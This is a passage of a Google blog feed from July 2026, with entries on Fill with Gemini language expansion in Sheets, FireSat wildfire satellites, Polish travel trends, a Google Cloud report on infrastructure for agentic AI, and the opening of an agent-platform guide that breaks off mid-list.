    <content type="html">&lt;p&gt;Earlier this year, we announced &lt;a href="https://workspaceupdates.googleblog.com/2026/04/effortlessly-automate-data-entry-in-Google-Sheets-using-Fill-with-Gemini.html" target="_blank"&gt;Fill with Gemini in Google Sheets&lt;/a&gt;, a new AI-powered feature designed to make data preparation and manual entry even easier. Leveraging the capabilities of the &lt;a href="https://support.google.com/docs/answer/15877199" target="_blank"&gt;AI function in Google Sheets&lt;/a&gt;, Fill with Gemini eliminates the need for complex formulas, helping you easily generate text, summarize information, categorize data, or analyze sentiment at scale with generated content appearing directly in the cells you choose.&lt;/p&gt;&lt;p&gt;Previously available in English, Spanish, Portuguese, Japanese, Korean, French, Italian, and German, both Fill with Gemini and the AI function are now expanding to users in Mandarin, Dutch, Malay, Hebrew, Polish, Turkish, Czech, Indonesian, Swedish, Danish, and Norwegian.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyEJfYdUzQk809xfJMUz4PMNcZmh5G491obQOv6eeKZ3bOjY2cGU_W_PbAYzWKNcp9znaMHuAaU0D7cTGl622SdPr6EDeyGDaFoA0YTr61pHZl_pzqk6yWO2KAbK0WMbkE_FutcXmmXAvpmfi248Tmf2FOIWh5au-zKg4Fpv0sNVDgWS8_1gpTjXMEKio/s2048/Fill%20with%20Gemini%20in%20Sheets%20now%20available%20in%2011%20additional%20languages%20-%207152.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyEJfYdUzQk809xfJMUz4PMNcZmh5G491obQOv6eeKZ3bOjY2cGU_W_PbAYzWKNcp9znaMHuAaU0D7cTGl622SdPr6EDeyGDaFoA0YTr61pHZl_pzqk6yWO2KAbK0WMbkE_FutcXmmXAvpmfi248Tmf2FOIWh5au-zKg4Fpv0sNVDgWS8_1gpTjXMEKio/s1600/Fill%20with%20Gemini%20in%20Sheets%20now%20available%20in%2011%20additional%20languages%20-%207152.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;Fill with Gemini is an entry point to the existing AI function. It will be hidden if the Smart features for Google Workspace setting is disabled. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/security/manage-google-workspace-smart-features-for-your-users" target="_blank"&gt;learn more about managing Google Workspace smart features for your users&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features &lt;/a&gt;enabled to use Fill with Gemini. Users can trigger Fill with Gemini by dragging a selection or selecting empty cells to see the prompt menu. Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/15877199#fill-columns" target="_blank"&gt;learn more about filling columns with Gemini&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&amp;nbsp;&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt;&amp;nbsp;Gradual rollout (up to 15 days for feature visibility) starting on July 7, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business:&lt;/b&gt; Business Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise:&lt;/b&gt; Enterprise Standard and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;AI Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;*Starting July 15, 2026, users with AI Expanded Access licenses will have &lt;a href="https://support.google.com/a?p=limits" target="_blank"&gt;higher limits&lt;/a&gt; on usage of Fill with Gemini and the AI function in Sheets.&amp;nbsp;&lt;/i&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/15877199" target="_blank"&gt;Use the AI function in Google Sheets&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/security/manage-google-workspace-smart-features-for-your-users#:~:text=In%20the%20Google%20Admin%20console,it%20actually%20reaffirms%20their%20importance" target="_blank"&gt;Set smart features &amp;amp; controls on or off for users&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/fill-with-gemini-in-sheets-now-available-in-11-additional-languages.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-07T16:25:56+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/models-and-research/google-research/firesat-satellites</id>
    <title>Three new satellites join the fight against wildfires.</title>
    <updated>2026-07-07T16:15:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/FireSat_satellites.max-600x600.format-webp.webp" /&gt;Three new FireSat satellites have launched, expanding a network that uses Google AI to help fire agencies detect early-stage wildfires.</content>
    <link href="https://blog.google/innovation-and-ai/models-and-research/google-research/firesat-satellites" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-07T16:15:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/odkrywanie-wyszukiwanie/zagraniczne-destynacje-i-wakacje-all-inclusive-trendy-podroznicze-2026-w-wyszukiwarce-google</id>
    <title>Zagraniczne destynacje i wakacje all inclusive: trendy podróżnicze 2026 w wyszukiwarce Google</title>
    <updated>2026-07-07T16:00:00+00:00</updated>
    <content type="html">Trendy podróżnicze Polska</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/odkrywanie-wyszukiwanie/zagraniczne-destynacje-i-wakacje-all-inclusive-trendy-podroznicze-2026-w-wyszukiwarce-google" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-07-07T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/compute/state-of-ai-infrastructure-report-overview</id>
    <title>Report: 83% of organizations need to upgrade their infrastructure to support agentic AI</title>
    <updated>2026-07-07T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For years, enterprise AI has been synonymous with conversational AI — the customer service bots and digital assistants we interact with every day. But today, the market has shifted. We’ve officially moved from moving from AI that answers through simple chats, to AI that takes action, automated workflows, and executes complex tasks on its own. While this unlocks entirely new use cases, there’s a catch: it places significant stress on the underlying infrastructure we’ve relied on in the past. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recently surveyed more than 1,400 senior IT leaders for our &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/state-of-infrastructure-in-the-agentic-ai-era?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;State of AI Infrastructure report&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and a resounding pattern emerged: the gap between AI ambition and infrastructure reality is widening. In fact, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;83% of organizations say they require infrastructure upgrades&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; to support production-grade agentic AI. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_10qYABK.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Why? Because yesterday’s infrastructure simply wasn't built for agents that act autonomously. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we lay out the core insights from our research on how leading organizations are rethinking their infrastructure to build resilient, fluid foundations. &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/state-of-infrastructure-in-the-agentic-ai-era?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;For more details and depth, we encourage you to download and read the full report.&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Escape the “inference tax” with fluid compute &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agentic workloads introduce a new level of scale, where a single prompt can trigger hundreds of downstream actions, requiring massive context windows to be held in memory. Trying to run these continuous reasoning loops on legacy architecture is financially unsustainable. In fact, 62% of leaders are seeing a significant inference tax driven by data egress fees, storage bloat, and idle specialized hardware. Furthermore, 81% cite operational complexity as a hidden cost of scaling AI.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To fix this, organizations need fluid compute — the ability to dynamically match the right silicon to the right task while minimizing operational overheads.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For heavy training&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Compute accelerators like our new &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;TPU 8t&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; deliver tremendous scale to train the world's most sophisticated models.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For low-latency inference:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The TPU 8i, meanwhile, was purpose-built to maximize on-chip memory, so agents can think and react in real-time.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For orchestration&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: General-purpose compute powered by CPUs is emerging as a critical component for driving AI control plane operations. Using highly efficient, Arm-based processors like Google Axion, organizations can cost-effectively run reinforcement learning simulations and orchestrate agents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Managing agent sprawl with centralized governance &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agents are designed to act autonomously — reading emails, querying databases, and executing workflows across your business. But as agentic AI scales, organizations are facing a new challenge: agent sprawl. How do you manage thousands of autonomous agents scattered across diverse platforms, without losing visibility and control?&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It’s no surprise that 79% of tech leaders cite security, governance, and MLOps as their top challenge to scaling inference. In the agentic era, you need a mature governance strategy before you can innovate. This entails creating a centralized control plane that provides a single system of record for agent permissions, identity, and workflows. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of patching together disparate tools, leading enterprises are relying on solutions like &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/govern/gateways/agent-gateway-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Gateway&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to enforce enterprise-grade governance. Agent Gateway gives you the visibility you need to see exactly how agents are sharing data. It lets you define precise read/write scopes and maintain full audit trails of every interaction, and it provides human-in-the-loop oversight for when an agent needs approval before taking a critical action. This drive for unified, straightforward governance explains why 78% of organizations now source their gen AI solutions directly from their primary cloud partner — a 30 point increase from 2025.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_Pam1FHa.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;A unified data layer&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agents perform reasoning, meaning they constantly run heavy queries across your organization. If your data is fragmented across silos, your AI is effectively flying blind.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To move from managing disconnected data to gathering unique and actionable business context, leaders are adopting a unified data layer. Using tools like Smart Storage — which automatically annotates unstructured data to make it searchable — and the Cross-Cloud Lakehouse, agents can natively read and understand data no matter where it lives, without needing custom pipelines or duplicated data.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Hybrid multicloud and digital sovereignty&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The debate between public cloud and local computing is settled: hybrid is the destination. In fact, 52% of organizations now use a hybrid multicloud architecture. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For technology leaders, this shift is largely driven by digital sovereignty and data gravity. Indeed, 48% of leaders are prioritizing infrastructure with strict data residency controls. You need the flexibility to run AI where it complies with shifting local laws. Whether that’s leveraging the public cloud for broad compute, or bringing foundational models entirely on-premises via Google Distributed Cloud for air-gapped isolation, modern infrastructure must adapt to geopolitical realities, not the other way around.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_XCE9hTG.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;h3&gt;AI at the edge&lt;/h3&gt;&lt;p&gt;For technology leaders and infrastructure architects, relying on a strictly centralized cloud topology to process every agentic interaction is not a viable strategy. A staggering 90% of organizations now rank edge deployment as important for AI initiatives, with 72% describing it as extremely or very important.&lt;/p&gt;&lt;p&gt;Moving AI to the edge solves three issues:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;The latency bottleneck:&lt;/b&gt; Real-time agents — especially those that rely on voice, video, or financial trading algorithms — can't afford the microsecond gap of a round-trip to a distant data center.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Operational resilience:&lt;/b&gt; If an internet connection drops, business can't stop. Edge deployment ensures that agents running in manufacturing plants, retail stores, or hospitals can continue functioning autonomously.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Sustaining cost-efficiency:&lt;/b&gt; Running always-on, continuous reasoning in the cloud is expensive. By utilizing highly optimized models on edge devices (like smartphones, IoT devices, or local warehouse servers), organizations shift the compute burden locally, drastically cutting variable per-token costs.&lt;/li&gt;&lt;/ul&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Breaking through the energy wall&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Energy consumption used to be a sustainability metric reserved for annual reports. Today, it plays a crucial operational role. 91% of leaders now factor power consumption into their hardware selection, with 61% rating it as a primary or significant factor.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For technology leaders, power consumption presents a three-fold barrier to growth:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Grid scarcity:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; You simply cannot buy more power in certain regions, heavily limiting how much compute infrastructure can be provisioned.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Regulatory compliance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Energy efficiency is now a strict legal prerequisite to operate. For example, in Germany, new data centers must achieve a Power Usage Effectiveness (PUE) of 1.2 or lower. And Ireland now mandates that large data centers provide 100% on-site dispatchable generation to match their grid draw.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Infrastructure economics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Inefficient power envelopes drastically inflate the Total Cost of Ownership (TCO) of AI deployments. Accommodating high-power hardware requires massive capital expenditure (CapEx) for advanced cooling architectures, specialized rack designs, and facility upgrades.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="4" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_DxzLo3u.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;To address the energy wall, technology leaders must treat energy as a strategic asset. One of the focus areas for optimization must shift to performance-per-watt. This is why co-designed silicon is becoming so important. For example, our new TPU 8t delivers nearly three times the performance of the prior generation while being up to twice as energy-efficient.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Unified, AI-optimized infrastructure&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ultimately, you cannot solve the challenges of tomorrow’s agentic systems with yesterday’s architecture. When engineering teams are forced to manually integrate heterogeneous compute, storage, and networking layers, organizations incur high operational overhead just to ensure basic interoperability.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To innovate quickly and cost-effectively, technology leaders are therefore moving toward holistic, unified systems. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This is the philosophy behind Google Cloud’s AI Hypercomputer. It’s an architecture where every layer is co-designed and co-engineered to work together. The custom silicon (TPUs, GPUs, CPUs) isn't designed in a silo; it's engineered alongside the ultra-high-bandwidth networking (Virgo Network), the storage (Managed Lustre, Hyperdisk), and the software orchestration layer (GKE).&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Bridging the digital and physical worlds&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When you embrace this co-designed, holistic approach, the results go far. With this level of scalable, fluid intelligence operating at the edge, we're entering the era of physical AI. A new generation of autonomous robots can sense, simulate, and navigate the physical world, practicing tasks millions of times in digital twin simulations on Google Cloud before they ever set foot in the real world. From performing complex industrial inspections to capturing cinematic videography, AI is now solving tangible problems in the real world.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Your blueprint for agentic AI&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Adapting your infrastructure to meet the demands that agentic applications place on your systems will help you move from pilot to production. The organizations set to thrive in 2026 are embracing a unified foundation that is cost-efficient, resilient at the edge, optimized for autonomous action — and governed by default. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to start? &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Download the &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/state-of-infrastructure-in-the-agentic-ai-era"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;State of AI Infrastructure&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; report to explore the data behind our findings, and discover how your peers are already building for success.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/compute/state-of-ai-infrastructure-report-overview" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-07T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/20-questions-for-the-agentic-enterprise</id>
    <title>20 questions for the Agentic Enterprise (and how Agent Platform can help)</title>
    <updated>2026-07-07T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you’re an IT leader, you might be getting a lot of questions about how to build and deploy agents. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The pressure to move fast is intense, but the engineering reality is incredibly complex. Where do your teams even begin? How do you untangle a fragmented mess of disconnected tools? And as things grow, how do you ensure your agents don’t accidentally leak sensitive data, or burn through your token budget in an afternoon? It’s a lot to balance, and trying to establish a secure foundation for an entire organization can quickly feel overwhelming.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;That’s why we built &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform?e=0"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. It gives your technical teams a unified destination to build, scale, govern, and optimize both customer-facing agents and the ones managing your internal operations. Agent Platform handles the underlying complexity so your teams can focus on driving actual business value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help you navigate these conversations, we gathered 20 essential questions to ask your engineering teams, along with some practical advice and code examples to get you going. Let’s dive in. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The build phase — establishing the foundation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#0 Who is building the application?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Before choosing a tool, look at who on your team is actually doing the work. Is it your engineer? Your legal team? Building with AI is no longer exclusive to high-code engineers. Anyone can &lt;/span&gt;&lt;a href="https://cloud.google.com/discover/what-is-vibe-coding?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;vibe code&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; now. This incredible accessibility has turned millions of non-coders into creators who can build and launch applications in seconds. So it means your work could be coming from anywhere. This may sound like an obvious step, but it’s an important one in the AI era. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The ecosystem now spans a spectrum of personas: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;no-code&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; business experts defining logic via visual interfaces (think: your business teams, sales, and marketing), &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;low-code&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; developers assembling modular parts, and &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;high-code&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; engineers creating bespoke, custom reasoning loops. Successful adoption means choosing a platform that empowers all three personas without siloing your data or security.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;#1 Where should my developers start?&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;When setting up an agentic strategy, it's easy to focus exclusively on the end product, like the agents that will handle customer support or financial analysis. But to build those sophisticated agents, you have to start by empowering the builders who write their underlying logic. Your developers need their own specialized AI tools, like coding agents, to accelerate code generation, scaffolding, and integration.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, most coding agents are isolated. They can only analyze the immediate file they are working on, with no connection to your live databases, internal documentation, tech stack, or business systems. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To keep your devs moving quickly without sacrificing governance, we recommend using &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/getting-started-google-antigravity#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; as your primary engineering harness, and then integrating specific extensions based on what that team is building. Here’s a helpful breakdown: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For core application engineers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Use the upgraded &lt;/span&gt;&lt;a href="https://adk.dev/tutorials/coding-with-ai/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Development Kit (ADK)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; as your baseline framework, paired with &lt;/span&gt;&lt;a href="https://google.github.io/agents-cli/guide/getting-started/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agents CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to handle the entire agent lifecycle from the terminal. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For data engineers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Plug in the &lt;/span&gt;&lt;a href="https://github.com/gemini-cli-extensions/data-agent-kit-starter-pack" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Data Agent Kit,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; which provides dedicated skills and Model Context Protocol (MCP) tools tailored for data pipelines.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;For Google Cloud ecosystems: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy &lt;/span&gt;&lt;a href="https://github.com/google/skills" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Agent Skills&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to give your coding environment native capabilities across Google products. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
